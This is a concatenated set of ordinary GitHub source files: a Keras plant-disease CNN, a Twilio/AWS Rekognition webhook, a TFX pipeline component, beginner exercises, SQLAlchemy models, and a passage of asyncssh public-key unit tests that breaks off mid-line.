1\n\n#model.add(Conv2D(32, (3, 3), padding=\"same\",input_shape=inputShape))\nmodel.add(Conv2D(32, (3, 3), input_shape=inputShape))\nmodel.add(Activation(\"relu\"))\n#model.add(BatchNormalization(axis=chanDim))\nmodel.add(MaxPooling2D(pool_size=(3, 3)))\n#model.add(Dropout(0.25))\n\n#model.add(Conv2D(64, (3, 3), padding=\"same\"))\nmodel.add(Conv2D(64, (3, 3)))\nmodel.add(Activation(\"relu\"))\n#model.add(BatchNormalization(axis=chanDim))\n\n#model.add(Conv2D(64, (3, 3), padding=\"same\"))\nmodel.add(Conv2D(64, (3, 3)))\nmodel.add(Activation(\"relu\"))\n#model.add(BatchNormalization(axis=chanDim))\nmodel.add(MaxPooling2D(pool_size=(2, 2)))\n#model.add(Dropout(0.25))\n\n#model.add(Conv2D(128, (3, 3), padding=\"same\"))\nmodel.add(Conv2D(128, (3, 3)))\nmodel.add(Activation(\"relu\"))\n#model.add(BatchNormalization(axis=chanDim))\n\n#model.add(Conv2D(128, (3, 3), padding=\"same\"))\nmodel.add(Conv2D(128, (3, 3)))\nmodel.add(Activation(\"relu\"))\n#model.add(BatchNormalization(axis=chanDim))\nmodel.add(MaxPooling2D(pool_size=(2, 2)))\n#model.add(Dropout(0.25))\n\nmodel.add(Flatten())\n\n#Fully Connected Layer\n#model.add(Dense(1024))\nmodel.add(Dense(128))\nmodel.add(Activation(\"relu\"))\n#model.add(BatchNormalization())\n#model.add(Dropout(0.5))\n\n#Output layer\nmodel.add(Dense(n_classes))\nmodel.add(Activation(\"softmax\"))\n\nmodel.summary()\n\n#opt = Adam(lr=INIT_LR, decay=INIT_LR / EPOCHS)\nopt = Adam(lr=INIT_LR)\n\n# distribution...Complile the model\n#model.compile(loss=\"binary_crossentropy\", optimizer=opt,metrics=[\"accuracy\"])\nmodel.compile(loss=\"categorical_crossentropy\", optimizer=opt,metrics=[\"accuracy\"])\n\n#BS = 1\n\n# train the network\nprint(\"[INFO] training network...\")\nhistory = model.fit_generator(\n aug.flow(x_train, y_train, batch_size=BS),\n validation_data=(x_test, y_test),\n steps_per_epoch=len(x_train) // BS,\n epochs=EPOCHS, verbose=1\n )\n\nacc = history.history['acc']\nval_acc = history.history['val_acc']\nloss = history.history['loss']\nval_loss = history.history['val_loss']\nepochs = range(1, len(acc) + 1)\n\n\n\"\"\"\nprint \"Training Accuracy...\"+str(acc)\nprint \"Validation Accuracy...\"+str(val_acc)\nprint \"Training loss...\"+str(loss)\nprint \"Validaton loss...\"+str(val_loss)\nprint \"Epochs...\"+str(epochs)\n\"\"\"\n\n#Plot the train and val curve\n#Train and validation accuracy\n\nplt.plot(epochs, acc, 'b', label='Training accurarcy')\nplt.plot(epochs, val_acc, 'r', label='Validation accurarcy')\nplt.title('Training and Validation accurarcy')\nplt.legend()\nplt.figure()\n\n#Train and validation loss\nplt.plot(epochs, loss, 'b', label='Training loss')\nplt.plot(epochs, val_loss, 'r', label='Validation loss')\nplt.title('Training and Validation loss')\nplt.legend()\nplt.show()\n\n\n#Model Accuracy\nprint(\"[INFO] Calculating model accuracy\")\nscores = model.evaluate(x_test, y_test)\nprint(\"Printing scores...\")\nprint(scores)\nprint(\"Test Loss: \"+str(scores[0]*100))\nprint(\"\\n%s: %.2f%%\" % (model.metrics_names[0], scores[0]*100))\nprint(\"Test Accuracy: \"+str(scores[1]*100))\nprint(\"\\n%s: %.2f%%\" % (model.metrics_names[1], scores[1]*100))\n\n#print \"Metrics Names :\"\n#for m in model.metrics_names:\n# print m\n\n#Save the model to disk\nprint(\"[INFO] Saving model...\")\nmodel.save(\"cnn_model.h5\")\n\n","repo_name":"unnikrishnancs/ComputerVision_01_PlantDiseaseClassification","sub_path":"PYTHON3_Final_plantdis_classi_v2.py","file_name":"PYTHON3_Final_plantdis_classi_v2.py","file_ext":"py","file_size_in_byte":8524,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"5965412702","text":"import os\nfrom pathlib import Path\nimport shutil\nimport requests\n\nfrom twilio.twiml.messaging_response import Body, Message, Redirect, MessagingResponse\n#from googletrans import Translator\nimport boto3\n\nrekogClient = boto3.client('rekognition')\n\n\n\ndef httpWebHooktoTwilioURL(event, context):\n print(event) #To have event come up in cloudwatchLogs\n numMedia = int(event['body']['NumMedia'])\n if (numMedia == 1):\n if (event['body']['MediaContentType0']=='image/jpeg'):\n image_url = event['body']['MediaUrl0']\n filename = os.path.join(os.getcwd(),Path(\"../../tmp/{}.jpg\".format(event['body']['MessageSid'])))\n retrieveContent = requests.get(image_url, stream = True)\n if retrieveContent.status_code == 200:\n retrieveContent.raw.decode_content = True #Required to ensure file size is not zero\n with open(filename,'wb') as f: #writing into file\n shutil.copyfileobj(retrieveContent.raw, f)\n\n with open(filename,'rb') as image:\n rekogResponse = rekogClient.recognize_celebrities(Image={'Bytes': image.read()})\n print(rekogResponse)\n bodyContent = \"{} celebrities found\".format(len(rekogResponse['CelebrityFaces']))\n if (len(rekogResponse['CelebrityFaces']) > 0):\n for celeb in rekogResponse['CelebrityFaces']:\n bodyContent += \"{} {} : {}% match confidence\".format(os.linesep,celeb['Name'],celeb['MatchConfidence'])\n else:\n bodyContent = \"Image type is not JPEG or PNG. Please send only one of these.\"\n elif (numMedia > 1) :\n bodyContent = \"Please only send one image at a time \"\n elif (numMedia == 0) :\n bodyContent = \"Hi, please attach a JPEG or PNG image for facial recognition of celebrities.\"\n try:\n #translator = Translator()\n response = MessagingResponse()\n message = Message()\n #message.body(translator.translate(event['body']['Body'],dest='hi').text) # Pre-tested on googletrans\n message.body(bodyContent)\n response.append(message)\n return response.to_xml()\n except:\n return \"An Error has occured. Please contact support.\"\n","repo_name":"anilmenon14/AWSRekognition_WhatsApp_Integration","sub_path":"handler.py","file_name":"handler.py","file_ext":"py","file_size_in_byte":2233,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"6"} +{"seq_id":"71969382269","text":"from kfp.components import InputPath, OutputPath\n\n\ndef ExampleValidator(\n statistics_path: InputPath('ExampleStatistics'),\n schema_path: InputPath('Schema'),\n\n anomalies_path: OutputPath('ExampleAnomalies'),\n):\n \"\"\"\n A TFX component to validate input examples.\n\n The ExampleValidator component uses [Tensorflow Data\n Validation](https://www.tensorflow.org/tfx/data_validation) to\n validate the statistics of some splits on input examples against a schema.\n\n The ExampleValidator component identifies anomalies in training and serving\n data. The component can be configured to detect different classes of anomalies\n in the data. It can:\n - perform validity checks by comparing data statistics against a schema that\n codifies expectations of the user.\n - detect data drift by looking at a series of data.\n - detect changes in dataset-wide data (i.e., num_examples) across spans or\n versions.\n\n Schema Based Example Validation\n The ExampleValidator component identifies any anomalies in the example data by\n comparing data statistics computed by the StatisticsGen component against a\n schema. The schema codifies properties which the input data is expected to\n satisfy, and is provided and maintained by the user.\n\n Please see https://www.tensorflow.org/tfx/data_validation for more details.\n\n Args:\n statistics: A Channel of 'ExampleStatistics` type. This should contain at\n least 'eval' split. Other splits are ignored currently.\n schema: A Channel of \"Schema' type. _required_\n Returns:\n anomalies: Output channel of 'ExampleAnomalies' type.\n\n Either `stats` or `statistics` must be present in the arguments.\n \"\"\"\n from tfx.components.example_validator.component import ExampleValidator as component_class\n\n #Generated code\n import json\n import os\n import tensorflow\n from google.protobuf import json_format, message\n from tfx.types import Artifact, channel_utils, artifact_utils\n\n arguments = locals().copy()\n\n component_class_args = {}\n\n for name, execution_parameter in component_class.SPEC_CLASS.PARAMETERS.items():\n argument_value_obj = argument_value = arguments.get(name, None)\n if argument_value is None:\n continue\n parameter_type = execution_parameter.type\n if isinstance(parameter_type, type) and issubclass(parameter_type, message.Message): # Maybe FIX: execution_parameter.type can also be a tuple\n argument_value_obj = parameter_type()\n json_format.Parse(argument_value, argument_value_obj)\n component_class_args[name] = argument_value_obj\n\n for name, channel_parameter in component_class.SPEC_CLASS.INPUTS.items():\n artifact_path = arguments[name + '_path']\n if artifact_path:\n artifact = channel_parameter.type()\n artifact.uri = artifact_path + '/' # ?\n if channel_parameter.type.PROPERTIES and 'split_names' in channel_parameter.type.PROPERTIES:\n # Recovering splits\n subdirs = tensorflow.io.gfile.listdir(artifact_path)\n artifact.split_names = artifact_utils.encode_split_names(sorted(subdirs))\n component_class_args[name] = channel_utils.as_channel([artifact])\n\n component_class_instance = component_class(**component_class_args)\n\n input_dict = {name: channel.get() for name, channel in component_class_instance.inputs.get_all().items()}\n output_dict = {name: channel.get() for name, channel in component_class_instance.outputs.get_all().items()}\n exec_properties = component_class_instance.exec_properties\n\n # Generating paths for output artifacts\n for name, artifacts in output_dict.items():\n base_artifact_path = arguments[name + '_path']\n # Are there still cases where output channel has multiple artifacts?\n for idx, artifact in enumerate(artifacts):\n subdir = str(idx + 1) if idx > 0 else ''\n artifact.uri = os.path.join(base_artifact_path, subdir) # Ends with '/'\n\n print('component instance: ' + str(component_class_instance))\n\n #executor = component_class.EXECUTOR_SPEC.executor_class() # Same\n executor = component_class_instance.executor_spec.executor_class()\n executor.Do(\n input_dict=input_dict,\n output_dict=output_dict,\n exec_properties=exec_properties,\n )\n\n\nif __name__ == '__main__':\n import kfp\n kfp.components.func_to_container_op(\n ExampleValidator,\n base_image='tensorflow/tfx:0.21.4',\n output_component_file='component.yaml'\n )\n","repo_name":"kubeflow/kfp-tekton-backend","sub_path":"components/tfx/ExampleValidator/component.py","file_name":"component.py","file_ext":"py","file_size_in_byte":4630,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"6"} +{"seq_id":"3013708094","text":"\"\"\"Assignment 5: Bank Account\"\"\"\nimport datetime as dt\n\nclass Transaction:\n \"\"\"\n A transaction class represents a monetary transaction event.\n It has two properties: an amount, and a timestamp.\n \"\"\"\n # Transaction is constructed with a required 'amount' argument however the initialized\n # timestamp is either None by default (current datetime is used) or a user defined\n # datetime value entered for the timestamp argument for every new Transaction() object.\n def __init__(self, amount, timestamp=None):\n self.amount = amount\n if not isinstance(timestamp, dt.datetime):\n self.timestamp = dt.datetime.now()\n else:\n self.timestamp = timestamp\n\n def __str__(self):\n \"\"\"Returns transaction with timestamp.\"\"\"\n dt_formatted = '{:%Y-%m-%d}'.format(self.timestamp)\n if self.amount < 0:\n amt_formattted = '-${0:.2f}'.format(self.amount * -1)\n elif self.amount > 0:\n amt_formattted = '+${0:.2f}'.format(self.amount)\n else:\n amt_formattted = '${0:.2f}'.format(self.amount)\n # Returns amount, time of transaction.\n return f'{dt_formatted}: {amt_formattted}'\n\n def __repr__(self):\n \"\"\"Returns expression which can be used to recreate this object.\"\"\"\n dt_formatted = '{:%Y_%#m_%#d}'.format(self.timestamp)\n # Returns amount, time of transaction.\n # String formatted especially to handle return sum of all transactions\n return f'[{self.amount}, ({dt_formatted})]'\n\nclass Account:\n \"\"\"\n The account class represents a bank account.\n It is constructed without any arguments.\n \"\"\"\n # Account is constructed without any arguments however the initialized\n # balance is zero or $0.00 for every new Account() object.\n def __init__(self):\n self.transactions = [] # array stores list of all transacations on Account() object\n self.balance = 0.00 # self.balance added solely for balance/testing purposes\n\n def deposit(self, amount):\n \"\"\"make deposit to account\"\"\"\n #ensure deposit amount is converted to a positive value\n if amount < 0:\n amount = amount * -1\n transaction = Transaction(amount)\n self.transactions.append(transaction)\n self.balance += amount\n\n def withdraw(self, amount):\n \"\"\"make withdrawal from account\"\"\"\n if amount < 0:\n amount = amount * -1\n if (self.balance - amount) < 0:\n print(\"Warning: account in overdrawn position \\nCheck account balance!\")\n #ensure withdraw amount is converted to a negative value\n amount = amount * -1\n transaction = Transaction(amount)\n self.transactions.append(transaction)\n self.balance += amount\n\n def get_balance(self):\n \"\"\"display the current balance in account object\"\"\"\n # return the current value of the balance\n return round(self.balance, 2) * 1.00\n\n\n def get_transactions(self):\n \"\"\"display list of transations in account object\"\"\"\n my_list = self.transactions\n print('\\n'.join(map(str, my_list)))\n","repo_name":"lopegeor1/project-5-banking-lopegeor1","sub_path":"banking.py","file_name":"banking.py","file_ext":"py","file_size_in_byte":3142,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"71472126909","text":"# open the file with the puzzle input\nf = open('./puzzle_input.txt')\n\n# number of assignment pairs where one range fully contains the other\ncontains = 0\n\ndef doesContain(a, b):\n minA = a[0]\n maxA = a[1]\n minB = b[0]\n maxB = b[1]\n\n return (minA <= minB) and (maxA >= maxB)\n\n# loop through the puzzle input\nwhile(True):\n # read next line\n line = f.readline()\n\n # EOF, break out of the loop\n if line == \"\":\n break\n \n # split assignment pair on the \",\" into range pairs\n rangePairs = line.strip().split(',')\n # split range pairs on the \"-\" into min/max values and map to ints\n rangeA = list(map(int, rangePairs[0].split('-')))\n rangeB = list(map(int, rangePairs[1].split('-')))\n\n # test if rangeA contains rangeB or rangeB contains rangeA\n if doesContain(rangeA, rangeB) or doesContain(rangeB, rangeA):\n contains += 1\n\nprint(\"Number of assignment pairs where one range fully contains the other\")\nprint(contains)\n","repo_name":"gcgarrett/advent-of-code-2022","sub_path":"day4/contains.py","file_name":"contains.py","file_ext":"py","file_size_in_byte":973,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"7991924196","text":"#def discounted(price, discount, max_discount=20):\nwhile True:\n try:\n price = abs(float(input()))\n discount = abs(float(input()))\n max_discount = abs(float(input()))\n if max_discount > 99:\n raise ValueError('Слишком большая максимальная скидка')\n if discount >= max_discount:\n print('цена остается таже: ' + str(price))\n else:\n print('цена со скидкой: ' + str(price - (price * discount / 100)) + '\\nразмер скидки = ' + str(price * discount / 100))\n except (ValueError):\n print('Введите число')\n except (KeyboardInterrupt):\n print('Забегай, еще ��окодим') \n break\n ","repo_name":"KomaKomar/lesson1","sub_path":"while2.py","file_name":"while2.py","file_ext":"py","file_size_in_byte":780,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"18917507222","text":"from sqlalchemy import JSON, BigInteger, Column, ForeignKey, Integer, LargeBinary, Numeric\nfrom sqlalchemy.types import String, TypeDecorator\n\nfrom .base import Base\n\n\nclass HexByteString(TypeDecorator):\n \"\"\"\n Convert Python bytestring to string with hexadecimal digits and back for storage.\n \"\"\"\n\n impl = String\n cache_ok = True\n\n def process_bind_param(self, value, dialect):\n if isinstance(value, bytes):\n return value.hex()\n\n elif isinstance(value, str):\n return bytes.fromhex(value.replace(\"0x\", \"\").lower()).hex()\n\n else:\n raise TypeError(f\"HexByteString columns support only bytes values: {value}\")\n\n def process_result_value(self, value, dialect):\n return bytes.fromhex(value.replace(\"0x\", \"\")) if value else None\n\n\nclass Blocks(Base):\n __tablename__ = \"blocks\" # type: ignore\n\n hash = Column(HexByteString, primary_key=True, nullable=False)\n num_transactions = Column(Integer, nullable=False)\n number = Column(Integer, nullable=False, index=True)\n parent_hash = Column(HexByteString, nullable=False)\n size = Column(Integer, nullable=False)\n timestamp = Column(BigInteger, index=True)\n gas_limit = Column(Integer, nullable=False)\n gas_used = Column(Integer, nullable=False)\n base_fee = Column(BigInteger, nullable=False)\n difficulty = Column(Numeric(scale=0), nullable=False)\n total_difficulty = Column(Numeric(scale=0), nullable=False)\n\n\nclass Transactions(Base):\n __tablename__ = \"transactions\" # type: ignore\n\n txn_hash = Column(HexByteString, primary_key=True, nullable=False)\n sender = Column(HexByteString, nullable=True)\n receiver = Column(HexByteString, nullable=True)\n gas_limit = Column(Numeric(scale=0), nullable=True)\n block_hash = Column(HexByteString, ForeignKey(\"blocks.hash\", ondelete=\"CASCADE\"))\n nonce = Column(Integer, nullable=True)\n value = Column(Numeric(scale=0), nullable=True)\n data = Column(LargeBinary, nullable=True)\n type = Column(String, nullable=True)\n signature = Column(HexByteString, nullable=True)\n\n\nclass ContractEvents(Base):\n __tablename__ = \"contract_events\" # type: ignore\n\n id = Column(Integer, primary_key=True, index=True)\n event_name = Column(String, nullable=False, index=True)\n contract_address = Column(HexByteString, nullable=False, index=True)\n event_arguments = Column(JSON, index=True)\n transaction_hash = Column(HexByteString, nullable=False, index=True)\n block_number = Column(Integer, nullable=False, index=True)\n block_hash = Column(HexByteString, nullable=False, index=True)\n log_index = Column(Integer, nullable=False, index=True)\n transaction_index = Column(Integer, nullable=False, index=True)\n","repo_name":"ApeWorX/ape","sub_path":"src/ape_cache/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2745,"program_lang":"python","lang":"en","doc_type":"code","stars":736,"dataset":"github-code","pt":"6"} +{"seq_id":"5037349317","text":"tuple_1 = (1, 2, 3)\ntuple_2 = ('one', 'hello')\ntuple_3 = (3, 2.3, 'three')\n\nprint(tuple_1[1])\nprint(type(tuple_1))\nprint(tuple_2)\nprint(tuple_3)\n\n\ncomputer = {\n 'CPU': 'AMD',\n 'RAM': 16000,\n 'SDD': 240,\n 'VideoCard': 'GeForce 1080ti',\n 'size': {'width': 350, 'height': 560, 'length': 420}\n}\n\npc_tuple = ('CPU: AMD', 'RAM: 16000', 'SDD: 240', 'VideoCard: GeForce 1080ti')\ncpu, ram, ssd, vga = pc_tuple\nprint(cpu, ram, ssd, vga )","repo_name":"NailKarimov/PhytonUdemyCourseTasks","sub_path":"UdemyWorks/4_Directory/tuples.py","file_name":"tuples.py","file_ext":"py","file_size_in_byte":442,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"25354254824","text":"import math\nimport os\nimport random\nimport re\nimport sys\n\n# Complete the minimumSwaps function below.\n\ndef minimumSwaps(arr):\n count=0\n n=len(arr)\n diction={}\n arr=[x-1 for x in arr]\n for ind, elem in enumerate(arr):\n diction[elem] = ind\n visited = [False] * n\n for elem, ind in sorted(diction.items(), key=lambda x: x[0]):\n if visited[elem] or elem == ind:\n continue\n cycles = 0\n i = elem\n while not visited[i]:\n visited[i] = True\n i = diction[i]\n cycles += 1\n count += cycles - 1\n return count\n\nif __name__ == '__main__':\n fptr = open(os.environ['OUTPUT_PATH'], 'w')\n\n n = int(input())\n\n arr = list(map(int, input().rstrip().split()))\n\n res = minimumSwaps(arr)\n\n fptr.write(str(res) + '\\n')\n\n fptr.close()","repo_name":"nikjohn7/Coding-Challenges","sub_path":"Hackerrank/Python/7.py","file_name":"7.py","file_ext":"py","file_size_in_byte":835,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"6"} +{"seq_id":"35396213183","text":"import binascii\nfrom datetime import datetime\nimport os\nfrom pathlib import Path\nimport shutil\nimport subprocess\nimport sys\nimport unittest\n\nfrom cryptography.exceptions import UnsupportedAlgorithm\n\nimport asyncssh\n\nfrom asyncssh.asn1 import der_encode, BitString, ObjectIdentifier\nfrom asyncssh.asn1 import TaggedDERObject\nfrom asyncssh.crypto import chacha_available, ed25519_available, ed448_available\nfrom asyncssh.misc import write_file\nfrom asyncssh.packet import MPInt, String, UInt32\nfrom asyncssh.pbe import pkcs1_decrypt\nfrom asyncssh.public_key import CERT_TYPE_USER, CERT_TYPE_HOST, SSHKey\nfrom asyncssh.public_key import SSHX509CertificateChain\nfrom asyncssh.public_key import decode_ssh_certificate\nfrom asyncssh.public_key import get_public_key_algs, get_certificate_algs\nfrom asyncssh.public_key import get_x509_certificate_algs\nfrom asyncssh.public_key import import_certificate_subject\nfrom asyncssh.public_key import load_identities\n\nfrom .sk_stub import sk_available, stub_sk, unstub_sk\nfrom .util import bcrypt_available, get_test_key, x509_available\nfrom .util import make_certificate, run, TempDirTestCase\n\n\n_ES1_SHA1_DES = ObjectIdentifier('1.2.840.113549.1.5.10')\n_P12_RC4_40 = ObjectIdentifier('1.2.840.113549.1.12.1.2')\n_ES2 = ObjectIdentifier('1.2.840.113549.1.5.13')\n_ES2_PBKDF2 = ObjectIdentifier('1.2.840.113549.1.5.12')\n_ES2_AES128 = ObjectIdentifier('2.16.840.1.101.3.4.1.2')\n_ES2_DES3 = ObjectIdentifier('1.2.840.113549.3.7')\n\ntry:\n _openssl_version = run('openssl version')\nexcept subprocess.CalledProcessError: # pragma: no cover\n _openssl_version = b''\n\n_openssl_available = _openssl_version != b''\n\nif _openssl_available: # pragma: no branch\n _openssl_curves = run('openssl ecparam -list_curves')\nelse: # pragma: no cover\n _openssl_curves = b''\n\n# The openssl \"-v2prf\" option is only available in OpenSSL 1.0.2 or later\n_openssl_supports_v2prf = _openssl_version >= b'OpenSSL 1.0.2'\n\n# Ed25519/Ed448 support via \"pkey\" is only available in OpenSSL 1.1.1 or later\n_openssl_supports_pkey = _openssl_version >= b'OpenSSL 1.1.1'\n\nif _openssl_version >= b'OpenSSL 3': # pragma: no branch\n _openssl_legacy = '-provider default -provider legacy '\nelse: # pragma: no cover\n _openssl_legacy = ''\n\ntry:\n if sys.platform != 'win32':\n _openssh_version = run('ssh -V')\n else: # pragma: no cover\n _openssh_version = b''\nexcept subprocess.CalledProcessError: # pragma: no cover\n _openssh_version = b''\n\n_openssh_available = _openssh_version != b''\n\n# GCM & Chacha tests require OpenSSH 6.9 due to a bug in earlier versions:\n# https://bugzilla.mindrot.org/show_bug.cgi?id=2366\n_openssh_supports_gcm_chacha = _openssh_version >= b'OpenSSH_6.9'\n_openssh_supports_arcfour_blowfish_cast = (_openssh_available and\n _openssh_version < b'OpenSSH_7.6')\n\npkcs1_ciphers = (('aes128-cbc', '-aes128', False),\n ('aes192-cbc', '-aes192', False),\n ('aes256-cbc', '-aes256', False),\n ('des-cbc', '-des', True),\n ('des3-cbc', '-des3', False))\n\npkcs8_ciphers = (\n ('aes128-cbc', 'sha224', 2, '-v2 aes-128-cbc '\n '-v2prf hmacWithSHA224', _openssl_supports_v2prf, False),\n ('aes128-cbc', 'sha256', 2, '-v2 aes-128-cbc '\n '-v2prf hmacWithSHA256', _openssl_supports_v2prf, False),\n ('aes128-cbc', 'sha384', 2, '-v2 aes-128-cbc '\n '-v2prf hmacWithSHA384', _openssl_supports_v2prf, False),\n ('aes128-cbc', 'sha512', 2, '-v2 aes-128-cbc '\n '-v2prf hmacWithSHA512', _openssl_supports_v2prf, False),\n ('des-cbc', 'md5', 1, '-v1 PBE-MD5-DES',\n _openssl_available, True),\n ('des-cbc', 'sha1', 1, '-v1 PBE-SHA1-DES',\n _openssl_available, True),\n ('des2-cbc', 'sha1', 1, '-v1 PBE-SHA1-2DES',\n _openssl_available, False),\n ('des3-cbc', 'sha1', 1, '-v1 PBE-SHA1-3DES',\n _openssl_available, False),\n ('rc4-40', 'sha1', 1, '-v1 PBE-SHA1-RC4-40',\n _openssl_available, True),\n ('rc4-128', 'sha1', 1, '-v1 PBE-SHA1-RC4-128',\n _openssl_available, True),\n ('aes128-cbc', 'sha1', 2, '-v2 aes-128-cbc',\n _openssl_available, False),\n ('aes192-cbc', 'sha1', 2, '-v2 aes-192-cbc',\n _openssl_available, False),\n ('aes256-cbc', 'sha1', 2, '-v2 aes-256-cbc',\n _openssl_available, False),\n ('blowfish-cbc', 'sha1', 2, '-v2 bf-cbc',\n _openssl_available, True),\n ('cast128-cbc', 'sha1', 2, '-v2 cast-cbc',\n _openssl_available, True),\n ('des-cbc', 'sha1', 2, '-v2 des-cbc',\n _openssl_available, True),\n ('des3-cbc', 'sha1', 2, '-v2 des-ede3-cbc',\n _openssl_available, False))\n\nopenssh_ciphers = (\n ('aes128-gcm@openssh.com', _openssh_supports_gcm_chacha),\n ('aes256-gcm@openssh.com', _openssh_supports_gcm_chacha),\n ('arcfour', _openssh_supports_arcfour_blowfish_cast),\n ('arcfour128', _openssh_supports_arcfour_blowfish_cast),\n ('arcfour256', _openssh_supports_arcfour_blowfish_cast),\n ('blowfish-cbc', _openssh_supports_arcfour_blowfish_cast),\n ('cast128-cbc', _openssh_supports_arcfour_blowfish_cast),\n ('aes128-cbc', _openssh_available),\n ('aes192-cbc', _openssh_available),\n ('aes256-cbc', _openssh_available),\n ('aes128-ctr', _openssh_available),\n ('aes192-ctr', _openssh_available),\n ('aes256-ctr', _openssh_available),\n ('3des-cbc', _openssh_available)\n)\n\nif chacha_available: # pragma: no branch\n openssh_ciphers += (('chacha20-poly1305@openssh.com',\n _openssh_supports_gcm_chacha),)\n\n\ndef select_passphrase(cipher, pbe_version=0):\n \"\"\"Randomize between string and bytes version of passphrase\"\"\"\n\n if cipher is None:\n return None\n elif os.urandom(1)[0] & 1:\n return 'passphrase'\n elif pbe_version == 1 and cipher in ('des2-cbc', 'des3-cbc',\n 'rc4-40', 'rc4-128'):\n return 'passphrase'.encode('utf-16-be')\n else:\n return 'passphrase'.encode('utf-8')\n\n\nclass _TestPublicKey(TempDirTestCase):\n \"\"\"Unit tests for public key modules\"\"\"\n\n # pylint: disable=too-many-public-methods\n\n keyclass = None\n base_format = None\n private_formats = ()\n public_formats = ()\n default_cert_version = ''\n x509_supported = False\n generate_args = ()\n single_cipher = True\n use_openssh = _openssh_available\n use_openssl = _openssl_available\n\n def __init__(self, methodName='runTest'):\n super().__init__(methodName)\n\n self.privkey = None\n self.pubkey = None\n self.privca = None\n self.pubca = None\n self.usercert = None\n self.hostcert = None\n self.rootx509 = None\n self.userx509 = None\n self.hostx509 = None\n self.otherx509 = None\n\n def make_certificate(self, *args, **kwargs):\n \"\"\"Construct an SSH certificate\"\"\"\n\n return make_certificate(self.default_cert_version, *args, **kwargs)\n\n def validate_openssh(self, cert, cert_type, name):\n \"\"\"Check OpenSSH certificate validation\"\"\"\n\n self.assertIsNone(cert.validate(cert_type, name))\n\n def validate_x509(self, cert, user_principal=None):\n \"\"\"Check X.509 certificate validation\"\"\"\n\n self.assertIsNone(cert.validate_chain([], [self.rootx509], [], 'any',\n user_principal, None))\n\n with self.assertRaises(ValueError):\n cert.validate_chain([self.rootx509], [], [], 'any', None, None)\n\n chain = SSHX509CertificateChain.construct_from_certs([cert])\n self.assertEqual(chain, decode_ssh_certificate(chain.public_data))\n\n self.assertIsNone(chain.validate_chain([self.rootx509], [], [], 'any',\n user_principal, None))\n\n self.assertIsNone(chain.validate_chain([self.rootx509],\n [], [self.otherx509], 'any',\n user_principal, None))\n\n with self.assertRaises(ValueError):\n chain.validate_chain([], [], [], 'any', user_principal, None)\n\n with self.assertRaises(ValueError):\n chain.validate_chain([self.rootx509], [], [cert], 'any',\n user_principal, None)\n\n def check_private(self, format_name, passphrase=None):\n \"\"\"Check for a private key match\"\"\"\n\n newkey = asyncssh.read_private_key('new', passphrase)\n algorithm = newkey.get_algorithm()\n keydata = newkey.export_private_key()\n pubdata = newkey.public_data\n\n self.assertEqual(newkey, self.privkey)\n self.assertEqual(hash(newkey), hash(self.privkey))\n\n keypair = asyncssh.load_keypairs(newkey, passphrase)[0]\n self.assertEqual(keypair.get_key_type(), 'local')\n self.assertEqual(keypair.get_algorithm(), algorithm)\n self.assertEqual(keypair.public_data, pubdata)\n self.assertIsNotNone(keypair.get_agent_private_key())\n\n keypair = asyncssh.load_keypairs([keypair])[0]\n self.assertEqual(keypair.public_data, pubdata)\n\n keypair = asyncssh.load_keypairs(keydata)[0]\n self.assertEqual(keypair.public_data, pubdata)\n\n keypair = asyncssh.load_keypairs('new', passphrase)[0]\n self.assertEqual(keypair.public_data, pubdata)\n\n keypair = asyncssh.load_keypairs([newkey])[0]\n self.assertEqual(keypair.public_data, pubdata)\n\n keypair = asyncssh.load_keypairs([(newkey, None)])[0]\n self.assertEqual(keypair.public_data, pubdata)\n\n keypair = asyncssh.load_keypairs([keydata])[0]\n self.assertEqual(keypair.public_data, pubdata)\n\n keypair = asyncssh.load_keypairs([(keydata, None)])[0]\n self.assertEqual(keypair.public_data, pubdata)\n\n keypair = asyncssh.load_keypairs(['new'], passphrase)[0]\n self.assertEqual(keypair.public_data, pubdata)\n\n keypair = asyncssh.load_keypairs([('new', None)], passphrase)[0]\n self.assertEqual(keypair.public_data, pubdata)\n\n keypair = asyncssh.load_keypairs(Path('new'), passphrase)[0]\n self.assertEqual(keypair.public_data, pubdata)\n\n keypair = asyncssh.load_keypairs([Path('new')], passphrase)[0]\n self.assertEqual(keypair.public_data, pubdata)\n\n keypair = asyncssh.load_keypairs([(Path('new'), None)], passphrase)[0]\n self.assertEqual(keypair.public_data, pubdata)\n\n keylist = asyncssh.load_keypairs([])\n self.assertEqual(keylist, [])\n\n if passphrase:\n with self.assertRaises((asyncssh.KeyEncryptionError,\n asyncssh.KeyImportError)):\n asyncssh.load_keypairs('new', 'xxx')\n\n if format_name == 'openssh':\n identities = load_identities(['new'])\n self.assertEqual(identities[0], pubdata)\n else:\n with self.assertRaises(asyncssh.KeyImportError):\n load_identities(['new'])\n\n identities = load_identities(['new'], skip_private=True)\n self.assertEqual(identities, [])\n else:\n newkey.write_private_key('list', format_name)\n newkey.append_private_key('list', format_name)\n\n keylist = asyncssh.read_private_key_list('list')\n self.assertEqual(keylist[0].public_data, pubdata)\n self.assertEqual(keylist[1].public_data, pubdata)\n\n newkey.write_private_key(Path('list'), format_name)\n newkey.append_private_key(Path('list'), format_name)\n\n keylist = asyncssh.load_keypairs(Path('list'))\n self.assertEqual(keylist[0].public_data, pubdata)\n self.assertEqual(keylist[1].public_data, pubdata)\n\n if self.x509_supported and format_name[-4:] == '-pem':\n cert = newkey.generate_x509_user_certificate(newkey, 'OU=user')\n chain = SSHX509CertificateChain.construct_from_certs([cert])\n\n cert.write_certificate('new_cert')\n\n keypair = asyncssh.load_keypairs(('new', 'new_cert'), passphrase)[0]\n self.assertEqual(keypair.public_data, chain.public_data)\n self.assertIsNotNone(keypair.get_agent_private_key())\n\n keypair = asyncssh.load_keypairs('new', passphrase, 'new_cert')[0]\n self.assertEqual(keypair.public_data, chain.public_data)\n self.assertIsNotNone(keypair.get_agent_private_key())\n\n newkey.write_private_key('new_bundle', format_name, 